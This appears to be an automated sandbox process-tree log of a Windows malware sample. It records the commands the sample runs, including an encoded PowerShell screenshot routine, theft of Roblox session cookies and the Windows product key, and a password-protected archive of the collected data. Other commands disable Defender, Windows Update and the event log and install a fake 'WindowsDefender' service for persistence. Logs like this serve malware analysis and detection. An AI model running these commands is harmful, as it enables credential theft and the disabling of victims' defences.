        C:\Windows\system32\cmd.exe /c "systeminfo"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2212
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:3532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1964
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        8⤵
        
        PID:2996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1512
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sr2y0kj4\sr2y0kj4.cmdline"
        9⤵
        
        PID:3836
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E26.tmp" "c:\Users\Admin\AppData\Local\Temp\sr2y0kj4\CSCC10A2910C2904CA4B2B4981B59FE4E.TMP"
        10⤵
        
        PID:2132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1344
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:3004
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:1136
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:3288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:5032
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:2448
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:1728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:1964
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:1896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:2624
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:1344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:4560
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:2104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:2840
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:2388
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\Mxtes.zip" *"
        7⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"1111" "C:\Users\Admin\AppData\Local\Temp\Mxtes.zip" *
        8⤵
        Executes dropped EXE
        
        PID:2364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        7⤵
        
        PID:4180
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        7⤵
        
        PID:1060
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:1964
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        7⤵
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:1312
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        Suspicious behavior: EnumeratesProcesses
        
        PID:1720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        7⤵
        
        PID:1744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\upinstall.exe
      4⤵
      PID:2040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\updater.exe
      4⤵
      PID:824
    - - C:\Users\Admin\AppData\updater.exe
        
        C:\Users\Admin\AppData\updater.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:1912
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:1620
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:3324
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:4300
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4436
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:4736
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:2128
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:4780
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:1364
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:5024
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:240
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:2828
      - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        6⤵
        
        PID:4304
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WindowsDefender"
        6⤵
        Launches sc.exe
        
        PID:3580
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\WindowsDefender\windows32.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:5056
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:3320
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WindowsDefender"
        6⤵
        Launches sc.exe
        
        PID:2296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\updater.exe
      4⤵
      PID:4580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3784

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4056

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4148

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4332

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1372

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5084

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3264

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4340

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:2288

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4764

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2608

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2404

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3224

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1072

C:\ProgramData\WindowsDefender\windows32.exe
C:\ProgramData\WindowsDefender\windows32.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4580
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2488
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:268
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1728
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4568
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3316
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2944
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3004
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3680
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3448
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2624
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2000
- C:\Windows\system32\dialer.exe
